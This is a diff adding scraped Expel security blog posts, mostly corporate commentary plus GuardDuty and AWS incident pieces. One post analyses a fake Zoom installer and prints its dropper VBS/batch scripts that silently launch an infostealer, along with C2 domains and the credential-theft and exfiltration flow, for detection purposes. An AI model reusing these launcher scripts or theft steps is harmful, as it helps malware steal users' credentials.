who used those products across multiple environments and industries \u2013 to give us a more diverse perspective. So we began to seek options for managed security providers. As we weighed our options, we evaluated the capabilities and strategic direction of well-known vendors and newer players. We ultimately selected Expel because of their passion and approach \u2013 particularly their transparency \u2013 was so aligned with our own principles. And we weren\u2019t disappointed. From deeply technical team calls to midnight consults via Slack, they\u2019ve got as much passion as we do, and we really understand each other. This produced an organic and collaborative solution to one of the most important functions of our work: ensuring that we keep our customers\u2019 data secure. 5. Invest where it counts \u2026 in people If you\u2019ve built a compelling vision, aligned security with the business, and communicated broadly, this one should be a cinch. But beware, when it comes to building your team, everyone will want to talk to you about HR banding and competitive pricing. But my advice on this one is simple: pay for talent. Period. You absolutely must have talented employees to build the best possible team. As much as I love and appreciate technology, I know that no tool will ever replace an amazing, talented rock star on your team. And when you can build a team of rock stars \u2026 there\u2019s nothing better. So, there you go. Those are my five key takeaways. I guarantee \u2013 even if this is your third or fourth rodeo in the CSO saddle \u2013 the first hundred days will be overwhelming, exhausting and exhilarating. But if you give yourself a little breathing room at the start and invest some time in doing your homework, you\u2019ll get what you need to develop and sell your vision for success. Relativity has a lot of great information about how they approach security on their website." +} \ No newline at end of file diff --git a/let-s-talk-compensation-why-expel-made-the-move-to-pay.json b/let-s-talk-compensation-why-expel-made-the-move-to-pay.json new file mode 100644 index 0000000000000000000000000000000000000000..8d62d16ce40ea00691057417a68dac9311695cb7 --- /dev/null +++ b/let-s-talk-compensation-why-expel-made-the-move-to-pay.json @@ -0,0 +1,6 @@ +{ + "title": "Let's talk compensation: Why Expel made the move to pay ...", + "url": "https://expel.com/blog/why-expel-made-the-move-to-pay-transparency/", + "date": "Apr 19, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Let\u2019s talk compensation: Why Expel made the move to pay transparency Talent \u00b7 3 MIN READ \u00b7 JEFF KAISER \u00b7 APR 19, 2022 \u00b7 TAGS: Careers If you know Expel, you know \u201ctransparency\u201d is our middle name. In fact, it\u2019s one of our core values. Which should mean it\u2019s not surprising that we\u2019ve recently embraced pay transparency at Expel. We believe that our people (current and prospective) should always feel comfortable asking about an employer\u2019s pay practices but, for many, that doesn\u2019t make the conversation any less daunting. We hope that practicing pay transparency (and spreading the word) will make this conversation easier \u2014 not just for our people, but for anyone looking to have an honest dialogue about compensation with their employer. In this post, we\u2019ll walk you through what this means to us at Expel, how we arrived at the decision, and what we\u2019ve learned along the way. Pay transparency is here to stay\u2026 and that\u2019s a good thing Pay transparency is a hot topic. Some big companies like Whole Foods and Netflix were early adopters of this approach. Now, new legislation rolling out across the U.S. requires companies to release details about pay when hiring. On top of that, the \u201cGreat Reshuffle\u201d has empowered people to ask employers for what they want \u2014 which includes fair pay. As the push for equity at work picks up speed, LinkedIn\u2019s #BigIdeas2022 predicts that 2022 is the year that pay transparency goes mainstream. We think that\u2019s the way it should be. So what is pay transparency? Pay transparency refers to the level of detail a company communicates about its pay practices. This typically happens on a scale, starting with providing basic salary info to the individual, all the way to sharing all of the details around how and why pay decisions are made. What does that scale look like at Expel? In short, we share salary ranges for job roles internally and externally, and have straightforward conversations with our people about their pay. That means: All Expletives (that\u2019s what we call our people) can see Expel salary ranges using our Compensation Lookup Tool. (A note that the salary ranges included in our tool are for roles; we do not disclose individual salaries.) Managers use the Compensation Lookup Tool as a reference when hiring. Equity, bonus, and commission targets are also included. All Expel job ads and descriptions include the salary min and max. Recruiters talk openly about our salary ranges to candidates. How did we get here? Over the past year, we\u2019ve been on a journey to analyze compensation, clarify decision criteria, and adjust our processes to make sure we\u2019re offering competitive, consistent, and equitable pay. There\u2019s no one-size-fits-all approach for going pay transparent. Each company has to conduct the studies and make the necessary investments to be confident in their pay practices, systems, and data. For us, this meant first conducting a salary equity analysis with an outside vendor that found no statistically significant bias in the way we pay at Expel. We then validated and adjusted our salary ranges by role to align with the market. It also involved reviews of the compensation of every Expletive to confirm consistency across roles, levels, and teams. Plus, we monitor these baselines continuously and conduct in-depth analyses annually (at least). Most importantly, we\u2019ve recognized that pay transparency is a work-in-progress. We use trusted data to track our salary ranges against the market, but we also listen to what our people, recruiters, and candidates have to say. Expletives are encouraged to ask questions and bring up their concerns around how we determine pay. We rely on our people to share new data, fresh ideas, and industry knowledge to help us navigate through the ever-changing compensation landscape. As part of that, we give Expletives resources to better understand our pay practices, and compensation education is part of everyone\u2019s professional development. For example: Live trainings and recordings are available to provide education on our compensation philosophy and strategy. We talk about job leveling, market positioning, and how we determine someone\u2019s position in their salary range. Our \u201cCompensation Lookup Tool\u201d gives all Expletives job info for all of the roles in the company, as well as salary ranges, bonus and equity information, and how we match the roles to the market. \u2026 And why? Part of our mission at Expel is to \u201ccreate space for people to do what they love,\u201d and that applies to our compensation philosophy, too. Pay transparency is a natural expression of Expel values: We take care of our people. We want everyone to have confidence in our consistent practices and equitable salaries, so they can go do what they love without that worry. We value transparency. Having clear decision criteria and helping Expletives understand how pay decisions are made opens communication and builds trust. Pay transparency improves inclusion and diversity. By communicating our salary ranges internally and externally, we are taking a solid step to disrupting systemic inequity. What we\u2019ve learned Pay transparency is about being transparent in more ways than one. It\u2019s about more than analyses and updated salary ranges on job ads. You have to \u201cwalk the walk\u201d and communicate the results to your people. Explain your compensation philosophy clearly, and give context and criteria for your pay decisions. After a year of work, we\u2019re proud of how far we\u2019ve come, and we\u2019ve made sure to bring Expletives along on every step of the journey. This honest and open approach to compensation isn\u2019t just what we believe in, it\u2019s the right thing to do. Questions about our move toward pay transparency, or anything else that makes Expel, Expel? Reach out any time ." +} \ No newline at end of file diff --git a/making-sense-of-amazon-guardduty-alerts.json b/making-sense-of-amazon-guardduty-alerts.json new file mode 100644 index 0000000000000000000000000000000000000000..7f29b107bf8483d509e94cafbba18412a06cf58b --- /dev/null +++ b/making-sense-of-amazon-guardduty-alerts.json @@ -0,0 +1,6 @@ +{ + "title": "Making sense of Amazon GuardDuty alerts", + "url": "https://expel.com/blog/making-sense-amazon-guardduty-alerts/", + "date": "Oct 15, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Making sense of Amazon GuardDuty alerts Security operations \u00b7 5 MIN READ \u00b7 ANTHONY RANDAZZO \u00b7 OCT 15, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC Gone are the days when we only had to protect some physical servers and all of the associated networking gear used to route traffic to and from those servers in our data centers. Fast forward to today \u2014 most companies are running at least some of their workloads in the cloud. Today we\u2019ve got virtualized servers, abstracted services and a simplified networking layer all managed via an API. Amazon Web Services (AWS) offers lots of security services to help protect their customers\u2019 data. One of the more well-known services for detection and response is Amazon GuardDuty . If you\u2019ve heard of Amazon GuardDuty but aren\u2019t exactly sure how to get the most out of it, then this post is for you. I\u2019ll talk about how Amazon GuardDuty works, share the kinds of threats it\u2019s looking for, show you some sample alert investigations and offer a couple tips for how to make more sense of the signals you get from GuardDuty. What is GuardDuty in AWS? Amazon GuardDuty is a continuous threat monitoring service available to AWS customers that works by consuming CloudTrail logs (AWS native API logging), Virtual Private Cloud (VPC) flow logs and DNS logs. Fortunately, CloudTrail logging is enabled by default \u2014 and you don\u2019t even have to pay for VPC flow logs or Amazon Route 53 (AWS DNS) to benefit from GuardDuty as long as you\u2019re using an AWS DNS resolver (versus using something like Google or OpenDNS). However, having VPC flow logs enabled will provide defenders another tool in their toolbox to use when investigating potential security incidents (more on this later). Now, if you consider what visibility AWS has into its customer\u2019s data and services , then GuardDuty\u2019s use of these three datasets make sense. Now let\u2019s look at what types of alerts GuardDuty might generate for us by using flow, DNS and API activity logs. As of today, there are 54 unique GuardDuty findings (more commonly known as rules). These are all based on easy to understand logic or basic anomaly detection. Each finding has the following naming convention: ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact We\u2019ll focus on the \u2018ResourceTypeAffected\u2019 portion of that convention because this is the most important section to understand when you\u2019re reviewing GuardDuty alerts. Today, this field will consist of either \u2018IAMUser\u2019 or \u2018EC2\u2019. All Elastic Cloud Compute (EC2) rules are based on VPC flow logs or DNS logs, while the \u2018IAMUser\u2019 rules generate alerts from CloudTrail API logs and possibly in conjunction with flow and DNS logs. We\u2019ve found the \u2018IAMUser\u2019 rules to be quite valuable, as they indicate authenticated access into your AWS account. Because of AWS\u2019 visibility into our data, many of the \u2018EC2\u2019 rules are based on an AWS-curated threat lists of atomic IOCs such as domains and IPs. These are then filtered against the flow and DNS logs. But there\u2019s a problem: just like with most security tech, we don\u2019t have any visibility into the threat lists that AWS is using and how they match up (or don\u2019t match up) with the threats we\u2019re concerned with for our own org. However, there\u2019s a silver lining here: You\u2019re able to provide your own threat lists from third parties and even automate the ingestion of these lists into GuardDuty. This can be IOCs you\u2019ve identified internally to your org or external feeds you subscribe to or consume through something like a Threat Intelligence Platform . When considering the pyramid of pain \u2014 a model focusing on how best to disrupt attackers \u2014 many of these GuardDuty alerts correspond to the bottom of the pyramid. When consuming lower fidelity alerts, we recommend enriching those with additional context to provide analysts with more decision support. Here at Expel we take advantage of some third-party enrichment services, such as passive DNS, WHOIS information, OSINT and other data to get a better understanding of the potential threats associated with these IPs and domains identified by GuardDuty. Investigating GuardDuty alerts Now that we have an idea of what to expect in a GuardDuty alert, let\u2019s take a look at a couple different example alerts. Expel uses the AWS API to consume our customers\u2019 GuardDuty alerts directly from their AWS Accounts and then we normalize the GuardDuty alert data in Expel Workbench for our analysts. NOTE: These alerts were generated with GuardDuty\u2019s built-in \u2018generate sample findings\u2019 regression test. Here we get a pretty straightforward explanation in Expel Workbench that our EC2 instance is making connections with a known Tor exit node . Given what we know about these EC2 rules, this alert was simply generated from the VPC flow logs based on an AWS threat list for known Tor exit nodes. This is where those VPC flow logs would really come in handy. Flow logs contain not only the source and destination IP and ports, but also how much traffic was actually passed. Depending on the function of your EC2 instance, this can paint a pretty telling picture as to whether there might be an instance compromise or not. If we need more answers, then you\u2019ll need a snapshot of that EC2 for a deeper dive or potentially having some other endpoint software such as EDR running inside of that instance. The latter will depend on your organization\u2019s risk tolerance for security software running on your production (AKA revenue generating) assets. Next, let\u2019s look at another alert that looks similar at a glance but has drastically different implications. This alert isn\u2019t quite as straightforward as the previous, but if we revisit what we know about GuardDuty alerts with \u2018IAMUser\u2019 as the ResourceTypeAffected, then we know this originated from a CloudTrail log(s). This is where we might sound the alarm. What you\u2019re looking at is someone with API credentials making successful API calls to your AWS account from the Tor anonymizing network. Unless your org has some privacy averse AWS admins or developers, then there\u2019s little reason for you see this particular alert. Now you need to do some analysis. Determine if an AWS Identity and Access Management (IAM) user or role was compromised as this could help you determine how those credentials may have been compromised. The key difference between these two are that User credentials are permanent whereas role credentials are temporary (lasting between 1 \u2013 12 hours). A user compromise might imply leaked API access keys on GitHub or something similar, while a role compromise will generally implicate some other deeper-rooted issue in your environment such a Server Side Request Forgery (SSRF) vulnerability . Lastly, let\u2019s look at a real-world GuardDuty alert. In this alert, Expel analysts identified the anomalous detection of an AWS service user (a Continuous Integration/Continuous Delivery IAM user) making a suspicious API call, ListAccessKeys , that should never be attempted by that user given its purpose. Fortunately, GuardDuty has some insight into what API calls a user or role normally makes. This threat actor was able to initially compromise a less privileged user access key for the AWS account and then the attacker pivoted with a variety of methods to expand access and privileges into other IAM users and roles. 4 things to remember when reviewing Amazon GuardDuty alerts GuardDuty alerts are generated based on VPC flow logs, DNS logs, and CloudTrail API logs. Currently, there are two primary classes of GuardDuty alerts: alerts based on DNS or VPC flow in and out of your EC2, and alerts that are generated from suspicious IAM (authenticated) API activity. Many of the GuardDuty alerts are generated based on threat lists of known malicious domains and IPs. Like most security technology, these threat lists may or may not be what you care about in your org\u2019s threat model \u2014 consider enriching these alerts with additional decision support such as passive DNS, WHOIS data, or other IP reputation. Keep a close eye out for IAM-related GuardDuty alerts, as this implies there\u2019s an authenticated API session to your AWS account." +} \ No newline at end of file diff --git a/malware-operators-zoom-ing-in.json b/malware-operators-zoom-ing-in.json new file mode 100644 index 0000000000000000000000000000000000000000..5701a49d84816178d5255e8a892e76ff80560483 --- /dev/null +++ b/malware-operators-zoom-ing-in.json @@ -0,0 +1,6 @@ +{ + "title": "Malware operators Zoom'ing in", + "url": "https://expel.com/blog/malware-operators-zooming-in/", + "date": "Apr 16, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Malware operators Zoom\u2019ing in Tips \u00b7 6 MIN READ \u00b7 JOSHUA KIM \u00b7 APR 16, 2020 \u00b7 TAGS: Get technical / Managed detection and response / Security Incident / SOC / Vulnerability It\u2019s no surprise that Zoom\u2019s popularity recently skyrocketed. Whether it\u2019s remote employees using it as their main way to stay connected or families finding virtual ways to visit with cousins and grandparents, it\u2019s become a go-to tool for staying in touch as we all practice good social distancing. When I say Zoom\u2019s popularity is off-the-charts high, I\u2019m not kidding . For fun, I compared its recent interests trend to that of other video apps, thanks to some data made available by Google . The TL;DR: It looks like we were collectively interested in the release of Tiger King on Netflix while also learning more about Zoom and how to change the background image. Comparison of common video conferencing applications interest over time. Everyone\u2019s using Zoom \u2026 what\u2019s new? Zoom\u2019s turned into the defacto video conferencing solution \u2013 and with that comes both wanted and unwanted attention . While the app provides a great opportunity for us to stay connected, your family, friends and neighbors may not be as security-conscious as you are \u2013 making them vulnerable to attack. In this post I\u2019ll detail a recent attack the Expel team identified and share some tips that you can follow to make sure your Zoom downloads are safe. \u201cIn the midst of chaos, there is also opportunity\u201d \u2013 Sun Tzu (\u2026 for clever attackers) Attackers are finding new ways to pounce and capitalize on the current global outbreak to target unsuspecting users via some of their most-loved apps and websites. Which is what we witnessed last week when our SOC identified an incident involving a drive-by download of a fake Zoom installer bundled with malware. If someone\u2019s downloading Zoom, are they sure they downloaded and installed Zoom directly from their website? With this recent finding, it\u2019s possible that many may have downloaded the installer from a fake website onto their computers \u2013 and social distancing isn\u2019t going to help protect you against this particular threat from accessing your sensitive data. Emerging threat: Zoom installers bundled with malware I\u2019ll walk you through exactly how this attack happened and will share a few tips for staying safe and avoiding a malware attack like this one. Take a look at the images below. This is a quick comparison of the malicious, self-extracting Zoom installer property details on the left and a legitimate property details of the installer (MD5: 088999a629a254d54a061eeb1cc8b1e2 ) on the right. The property details on the right shows the legitimate installer dropped by the bundled installer on the left. The bundled Zoom installer was hosted from the malicious website hxxp://zoom-free2[.]com/download/zoominstaller.exe . When executed, a copy of a legitimate Zoom installer and malicious files are written to disk within the directory C:zoominst . The dropped files are detailed within the table below. Filename Description Hash nanohost.exe ARKEI/VIDAR Trojan 1465a5f6107ba60876e0b8d8024acdad ZoomInstaller.exe Legitimate installer 088999a629a254d54a061eeb1cc8b1e2 Icon_2.ico Zoom icon file ea3fea284dbc1ed6f173e42cb6987e39 Filename unin1213.vbs Hash 0cc21abbedd1227a1956148b929d051f Content Set WshShell = CreateObject(\"WScript.Shell\") WshShell.Run \"object73237.bat\", 0, false Filename object73237.bat Hash 3bafbf4633945d2c16523a9312e9d2fd Content @Echo off ZoomInstaller.exe timeout 3 start nanohost.exe Details of the files that are created within C:zoominst folder. While the attack successfully installs and launches a legitimate version of Zoom to avoid user suspicion, it also drops a payload named nanohost.exe on the victim\u2019s machine that performs malicious activity. nanohost.exe (shown above under \u201cfilename\u201d) is closely related to, and a variant of, the ARKEI/VIDAR information stealer (InfoStealer) malware family. nanohost.exe will query system settings, such as timezone, machine ID, hostname, display settings, hardware information, running process information and saving the queried results output to disk with the filename information.txt located within a randomly generated folder name in %PROGRAMDATA%[RANDOM]filesinformation.txt . The malware is profiling the infected system likely to be used for reference by the attacker. Now let\u2019s look at the format of the output data contained within the information.txt file: Version: Date: MachineID: GUID: [br] Path: Work Dir: C:ProgramData [br] Windows: Computer Name: User Name: Display Resolution: Display Language: Keyboard Languages: Local Time: TimeZone: [br] [Hardware] Processor: CPU Count: RAM: VideoCard: [br] [Network] IP: Country: City: ZIP: Coordinates: ISP: [br] [Processes] \u2014\u2014\u2014- System [] \u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014 smss.exe [] \u2013 [] \u2014 \u2013 [] [br] [Software] Contents of information.txt As per the [Network] block within the information.txt file, nanohost.exe will perform an IP geolocation lookup of the victim system using ip-api[.]com/line/ . The service returns information about the victim\u2019s public IP address such as: country, city, zip code, latitude, longitude, ISP and other details. The results are saved to information.txt . Here\u2019s an example of what the outbound HTTP POST request to the IP geolocation lookup service looks like: HTTP POST request to IP geolocation lookup service. nanohost.exe is configured to connect to the external, command-and-control (C2) server at wrangellse[.]com for additional execution of arbitrary code. The malware attempts to download additional DLL files staged within the web root directory of the C2 server. The DLL files are written to the victim machine located within the root folder of %PROGRAMDATA% . Based on the naming convention of the DLL files, these are likely used by nanohost.exe to support scraping of sensitive web browser data. Once the DLL files are downloaded from the C2 server, nanohost.exe accesses and retrieves sensitive data from FTP applications installed such as FileZilla and web browsers installed on the victim machine ranging from Internet Explorer, Google Chrome, Mozilla Firefox, Torch, Uran and various other Chromium-based browsers. After successful collection and consolidation of host reconnaissance output, browser and FTP application data, nanohost.exe sends an outbound HTTP POST request with the pertinent data within the request body to wrangellse[.]com . Here\u2019s where the malware established an outbound HTTP POST request to the C2 server. Outbound HTTP POST request containing host reconnaissance output The observed network traffic activity generated from nanohost.exe is displayed within the screenshot below. Packet capture filter display on the destination C2 server. An overview of process execution spawned from the malware-bundled Zoom installer is summarized below. Overview of malicious process activity While there\u2019s plenty more we could discuss around the capabilities of ARKEI/VIDAR trojan, the important message to re-inforce is that malware operators are continuing to adapt and take full advantage of the current, pandemic circumstances, exploiting popular trends to further push their agenda . If you\u2019re using Zoom \u2026 \u2026 then keep these tips in mind as you (or someone you know) is downloading and using the software. For employees, adhere to your organization\u2019s IT policy. Don\u2019t install unapproved software. And if you\u2019re not sure if something\u2019s approved, ask first before downloading it. When using Zoom at home on your own equipment (mobile, PC/laptop), download the software directly from Zoom\u2019s website and make sure it\u2019s secure before installing. Don\u2019t click on a Zoom download link that was sent to you via SMS (for mobile installation), e-mail or a pop-up window that appeared while browsing the web. Instead, go directly to Zoom\u2019s website and navigate to their Downloads page . If you aren\u2019t joining a Zoom meeting through a mobile app, software client or browser extension, go to Zoom\u2019s official website and use their Join A Meeting option to connect directly to the meeting from your browser. Be sure to follow the same rules in the bullet above. Take the time to read through the privacy and security resource guides made available by Zoom. We\u2019re working on another blog post all about recommended, hardening settings for your Zoom meetings to help avoid potential risks. Stay tuned. While attackers may use these strange times as an opportunity to strike, remember that there are measures we can all take to protect ourselves. Stay safe, everyone. Below are charts that can be used as reference. MITRE ATT&CK Matrix Table Initial Access Drive-by Compromise Execution Third-party Software, User Execution Defense Evasion Hidden Window, Software Packing Credential Access Credentials from Web Browsers, Credentials in Files Discovery File and Directory Discovery, Process Discovery, Query Registry, Software Discovery, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery Collection Automated Collection, Data from Local System Command And Control Remote File Copy, Standard Application Layer Protocol Exfiltration Automated Exfiltration, Data Compressed, Exfiltration Over Command and Control Channel MITRE ATT&CK Matrix Table Indicators Type Artifact Network zoom-free2[.]com Network wrangellse[.]com Network ip-api[.]com File Path %PROGRAMDATA%vcruntime140.dll File Path %PROGRAMDATA%softokn3.dll File Path %PROGRAMDATA%nss3.dll File Path %PROGRAMDATA%msvcp140.dll File Path %PROGRAMDATA%mozglue.dll File Path %PROGRAMDATA%freebl3.dll File Path %PROGRAMDATA%filesSoftAuthy File Path c:zoominstunin1213.vbs File Path c:zoominstobject73237.bat File Path c:zoominstnanohost.exe File Path c:zoominstZoomInstaller.exe File Path %USERPROFILE%Downloadszoominstaller.exe Hash 1465a5f6107ba60876e0b8d8024acdad Hash 2c59f16921956b05f97a5b3e208168a6 File Name information.txt File Name passwords.txt File Name ld Indicator of compromise (IOC) Detections YARA Rule rule ZOOMBA { meta: author = \"@heyjokim\" description = \"Self-extracting, Zoom installer bundled with malware\" reference = \"2c59f16921956b05f97a5b3e208168a6\" strings: $s1 = \"ZoomInstaller.exe\" $s2 = \"Release\\sfxrar.pdb\" condition: uint16(0) == 0x5A4D and all of ($s*)} Custom detections" +} \ No newline at end of file diff --git a/managed-detection-and-response-mdr-symptom-or.json b/managed-detection-and-response-mdr-symptom-or.json new file mode 100644 index 0000000000000000000000000000000000000000..83b6b3e7c703ad8d966520f7ffbefc83ff515837 --- /dev/null +++ b/managed-detection-and-response-mdr-symptom-or.json @@ -0,0 +1,6 @@ +{ + "title": "Managed detection and response (MDR): symptom or ...", + "url": "https://expel.com/blog/managed-detection-and-response-mdr-symptom-or-solution/", + "date": "Jan 11, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Managed detection and response (MDR): symptom or solution? Security operations \u00b7 5 MIN READ \u00b7 DAVE MERKEL \u00b7 JAN 11, 2018 \u00b7 TAGS: Managed detection and response / Managed security / MDR / Selecting tech / Tools Newsflash! Managed security service providers (MSSPs), for the most part, kinda suck . They\u2019re really good at taking your money. But, if you\u2019re looking for security operations capability \u2014 y\u2019know, like finding bad guys or investigating a breach \u2014 your odds are better if you\u2019re looking elsewhere. \u201cBut wait! We do that!\u201d they say. \u201cUmmm \u2026 no. You actually don\u2019t,\u201d say their customers (right before they switch providers \u2026 again \u2026 repeating the cycle of disillusionment anew). Customer dissatisfaction with MSSPs has gotten so bad that a whole new \u201cproto-market\u201d has popped up that basically \u2026 well \u2026 it does the things customers thought they were getting (but ultimately didn\u2019t) when they first signed their MSSP contract. Industry analysts have even anointed it with its own three-letter acronym: Managed Detection and Response (MDR). The term has been around for a while. In fact, I was a witness to its creation (more on that later). But I still run into lots of folks that don\u2019t necessarily understand what MDRs do. And I don\u2019t hear a lot of people calling it by that name. It could be because we vendors are craptastic at telling people what we do (I\u2019m not sure where we caught that disease\u2026 but it\u2019s rampant). But I think there\u2019s a different reason: MDR isn\u2019t really a market. It\u2019s a symptom. Specifically, MDR is a symptom of MSSPs\u2019 lack of innovation. They whiffed so hard that they let a whole new mini market pop up in their front yard. Full disclosure: Expel is playing in this space, so this is your fair warning that this post is obviously self serving. But, at least I\u2019m being honest about it. And it does reflect my thoughts on the state of the universe, for better or for worse. Read on at your own peril. So what do I mean when I say that MDR isn\u2019t a market? I\u2019ll tell you what I don\u2019t mean. I don\u2019t mean the capabilities that MDRs provide are useless. If I believed that I wouldn\u2019t have founded Expel. What I mean, is that it\u2019s not a long-term market \u2026 at least not in its current form. The emergence of MDRs is a sign that customers want (and need) REAL managed security that \u2026 ummmm \u2026 manages their security. There\u2019s no doubt that MDRs offer pieces of what companies want \u2026 but not (yet) most of what they need: managed security that doesn\u2019t suck. First, let\u2019s back up and consider how this MDR thing came to pass. It turns out I was there at the beginning. Or, perhaps, more accurately, \u201ca beginning\u201d since new market trends \u2014 even ones with an acronym \u2014 rarely have a sole genesis. In any case, here\u2019s my specific superhero (villain?) origin story: Once upon a time \u2026 in the old country (a shorthand we use at Expel to refer to places we used to work) we had a really advanced endpoint product. It was ugly from a UX perspective (my fault) but we could make it sing. Sadly, many potential customers couldn\u2019t. When the evildoers invaded our customers\u2019 networks we used that product to provide incident response services. Once we had banished the villains and solved the customer\u2019s problem we would pack up to leave. Then it came to pass that the customer would practically tackle us and beg us to stay: \u201cWe can\u2019t do what you do \u2026 and neither can our MSSP. What you\u2019re doing is *really* valuable. Can I have some more?\u201d they would cry. They huffed and they puffed and after we were hit in the head enough times with this two-by-four, we finally said \u201cy\u2019know, there might be a business here.\u201d We experimented with a few customers, tailoring a managed threat hunting/investigation offering on top of our endpoint product. We sold a few and decided to make it a business. It grew \u2026 and grew \u2026 and grew \u2026 and focused primarily on using our own endpoint technology and only on finding truly advanced threats. And everybody lived happily ever after. We sold a new managed offering which included our product. The customer didn\u2019t have to develop (and \u2026 even more difficult \u2026 maintain) the expertise to do what we could do. Since then, other MDR vendors have crafted their own similarly shaped origin stories. Perhaps a specific use case, technology or market shaped their offering. They found a niche and conquered it. There\u2019s nothing wrong with that. These MDRs have made the world a better place. Here are four reasons why: 1. They find bad guys and gals: Huzzah! That\u2019s their reason for being, so this shouldn\u2019t be surprising. 2. They use modern tech: It sounds obvious but it\u2019s super important \u2026 and many MSSPs don\u2019t do it. Most MDR providers use technologies built in the current decade. These modern capabilities offer defenders more options for visibility and they can keep you nimble if you use them properly. 3. Better yet \u2026 they use endpoint tech: Double clicking (did I just really say that?) on #2 \u2026 MDR offerings use endpoint product offerings and data in a completely competent way. This is huge. Endpoint products are often complicated and interpreting the data requires a fair degree of sophistication \u2026 but the results are key to modern threat detection and response. 4. They\u2019re adversary oriented: Some MDR offerings raise awareness of how capable the adversary actually is. This can impact spending and how the business views security. Again, that\u2019s a good thing. Still \u2026 all of ^these^ things fall under the category of \u201cstuff MSSPs should have been doing all along, but aren\u2019t.\u201d But the reason why I don\u2019t think MDR is a market \u2026 or at least not the end state of the managed security market is that there are some big things that MDRs (as currently defined) don\u2019t do. And the fact that they don\u2019t do them limits the value pure-play MDRs can deliver. Here are a few examples: They don\u2019t use your existing tech: Often, MDR vendors bring some of their own security products to the proverbial table. This can force you to ditch (or ignore) something you already paid for (a network sensor, a SIEM or endpoint tool) regardless of whether or not your existing product is capable. Not awesome. They\u2019re threat snobs: Frequently, MDR providers focus on \u201cadvanced\u201d threats. Chasing super-elite bad guys makes for great war stories. But less sophisticated individuals acting of their own accord could cripple your business. The time it takes advanced tactics to trickle down to these types of threat actors continues to shrink. Can you afford to be snooty about the threats your solutions providers pay attention to? Compliance \u2026 huh? MDRs are often less interested in compliance use cases. While I\u2019d never argue that compliance=security, that doesn\u2019t eliminate the need to be compliant \u2014 particularly in more heavily regulated businesses. Security operations: Ultimately, most organizations need a solid, functioning security operations capability. MDRs aren\u2019t that. They\u2019re expensive, almost \u201cprofessional services\u201d shaped offerings that are good at finding shiny things, but not so much at addressing your security operations gap. They\u2019re not transparent: For all the things MDRs are doing that are an improvement on the legacy MSSP market, they still suffer from the black box approach that has frustrated so many MSSP customers. Their value stops when the alerts stop: What did you pay for? What did they do? If there weren\u2019t bad guys attacking you on a random Tuesday, what value did they provide? If the bad guys stayed home (and no alerts fired) how will you defend your spend to the business? How did they make you better? MDRs should be sucking the air out of the MSSP balloon. But they\u2019re not (yet). Instead, I\u2019ve seen scenarios where customers are paying twice, either stitching together multiple MSSPs or layering an MDR on top of an MSSP. Or \u2026 perhaps the most troubling scenario I\u2019ve seen \u2026 a company with two MSSPs who hired a third consulting company to manage their MSSPs. It\u2019s kinda like what you find with network or endpoint security technologies \u2014 \u201cDefense (aka expense) in depth.\u201d Why is this happening? Well \u2026 MDRs still need to close the gaps I highlighted above. Customers aren\u2019t looking for an acronym and they don\u2019t care much about your origin story. They just want someone to solve their problem. MDRs do some of that today \u2026 but they still have some ground to cover starting with using the security investments you\u2019ve already made. Wouldn\u2019t that be great? Yeah, we think so too. Someone should do something about that one of these days." +} \ No newline at end of file diff --git a/managed-detection-response-for-aws-access-keys.json b/managed-detection-response-for-aws-access-keys.json new file mode 100644 index 0000000000000000000000000000000000000000..0bfaefd19002007a5042abfa414c77d950fb5f6d --- /dev/null +++ b/managed-detection-response-for-aws-access-keys.json @@ -0,0 +1,6 @@ +{ + "title": "Managed Detection & Response for AWS Access Keys", + "url": "https://expel.com/blog/finding-evil-in-aws/", + "date": "Apr 28, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Managed Detection & Response for AWS Security operations \u00b7 7 MIN READ \u00b7 ANTHONY RANDAZZO, BRITTON MANAHAN AND SAM LIPTON \u00b7 APR 28, 2020 \u00b7 TAGS: CISO / Company news / Get technical / Heads up / Managed security Detection and response in cloud infrastructure is a relatively new frontier. On top of that, there aren\u2019t many compromise details publicly available to help shape the detection strategy for anyone running workloads in the cloud. That\u2019s why our team here at Expel is attempting to bridge the gap between theory and practice. Over the years, we\u2019ve detected and responded to countless Amazon Web Services (AWS) incidents, ranging from public S3 bucket exposures to compromised EC2 instance credentials and RDS ransomware attacks. Recently, we identified an incident involving the use of compromised AWS access keys. In this post, we\u2019ll walk you through how we caught the problem, what we observed in our response, how we kicked the bad guy out and the lessons we learned along the way. Compromised AWS access keys: How we caught \u2018em We first determined there was something amiss thanks to an Expel detection using CloudTrail logs. Here at Expel, we encourage many of our customers who run on AWS to use Amazon GuardDuty. But we\u2019ve also taken it upon ourselves to develop detection use cases against CloudTrail logs . GuardDuty does a great job of identifying common attacks, and we\u2019ve also found CloudTrail logs to be a great source of signal for additional alerting that\u2019s more specific to an AWS service or an environment. It all started with the alert below, telling us that EC2 SSH access keys were being generated ( CreateKeyPair / ImportKeyPair ) from a suspicious source IP address. Initial lead Expel alert How\u2019d we know it was suspicious? We\u2019ve created an orchestration framework that allows us to launch actions when certain things happen. In this case, when an alert fired an Expel robot picked it up and added additional information. This robot uses a third-party enrichment service for IPs (in this case, our friends at ipinfo.io ). More on our robots here shortly. Keep in mind that these are not logins to AWS per se. These are authenticated API calls with valid IAM user access keys. API access can be restricted at the IP layer, but it can be a little burdensome to manage in the IAM Policy. As you can see in the alert shown above, there was no MFA enforced for this API call. Again, this was not a login, but you can also enforce MFA for specific API calls through the IAM Policy . We\u2019ve observed only a few AWS customers using either of these controls. Another interesting detail from this alert was the use of the AWS Command Line Interface (CLI) . This isn\u2019t completely out of the norm, but it heightened our suspicion a bit because it\u2019s less common than console (UI) or AWS SDK access. Additionally, we found this user hadn\u2019t used the AWS CLI in recent history, potentially indicating a new person was using these credentials. The manual creation of an access key was also an atypical action versus leveraging infrastructure as code to manage keys (i.e. CloudFormation or Terraform). Taking all of these factors into consideration, we knew we had an event worthy of additional investigation. Cue the robots, answer some questions Our orchestration workflows are critically important \u2013 they tackle highly repetitive tasks, that is answer questions an analyst would ask about an alert, on our behalf as soon as the alert fires. We call these workflows our robots. When we get an AWS alert from a customer\u2019s environment, we have three consistent questions we like to answer to help our analysts determine if it\u2019s worthy of additional investigation (decision support): Did this 